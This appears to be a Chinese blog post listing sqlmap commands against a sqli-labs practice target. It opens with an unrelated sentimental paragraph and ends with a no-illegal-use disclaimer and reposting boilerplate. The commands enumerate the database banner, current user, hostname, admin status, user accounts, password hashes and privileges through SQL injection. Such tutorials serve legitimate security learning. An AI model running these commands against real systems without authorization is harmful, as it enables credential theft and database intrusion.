自从你删了我以后,我看了一年五个月的资料,时隔一年五个月,你突然出现在我的访客里,我呆坐了一夜,笑着哭,哭着笑,瞒着所有人我还是很喜欢你。。。
一、sqlmap检索DBMS Banner
–banner或者-b
sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” -b
二、sqlmap检索DBMS当前用户
sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --current-user
三、sqlmap检索DBMS当前数据库
sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --current-db
四、sqlmap检索DBMS当前主机名
sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --hostname
五、sqlmap探测当前用户是否是数据库管理员
sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --is-dba
六、枚举DBMS用户
sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --user
七、枚举DBMS用户密码
sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --password
八、枚举DBMS权限
sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --role
sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --privileges
禁止非法,后果自负
欢迎大家关注公众号:web安全工具库
本文来自互联网用户投稿,文章观点仅代表作者本人,不代表本站立场,不承担相关法律责任。如若转载,请注明出处。 如若内容造成侵权/违法违规/事实不符,请点击【内容举报】进行投诉反馈!
